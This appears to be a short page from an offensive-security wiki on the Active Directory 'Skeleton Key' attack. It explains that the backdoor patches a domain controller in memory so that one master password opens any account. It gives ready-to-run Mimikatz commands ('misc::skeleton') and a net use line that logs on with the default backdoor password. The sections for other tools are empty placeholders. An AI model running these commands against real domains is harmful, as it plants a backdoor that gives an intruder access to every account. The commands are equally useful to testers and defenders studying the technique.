Page cover image

🔥Skeleton Keys

Escalate privileges on a Domain using skeleton keys

Do Not play GOD without Permission!

• The Skeleton Key only works for Kerberos RC4 encryption;

• The Skeleton Key is a backdoor that runs on the Domain Controller (in memory) and allows single password (the skeleton password) that can be used to log on to any account;

• As it runs in memory, it does not persist by itself (but can, of course, be scripted or persisted)

What is a Skeleton Key?

What permissions do I need to generate a Skeleton Key?

Domain Admin

MimiKatz

privilege::debug
misc::skeleton
net use p: \\WIN-MACHINE01\admin$ /user:rfs mimikatz

Run on Windows CMD

mimikatz.exe "privilege::debug" "misc::skeleton" exit

Empire

// Some code

Metasploit

// Some code

CrackMapExec

// Some code

LSA Protection ByPASS

Articles

Videos

Last updated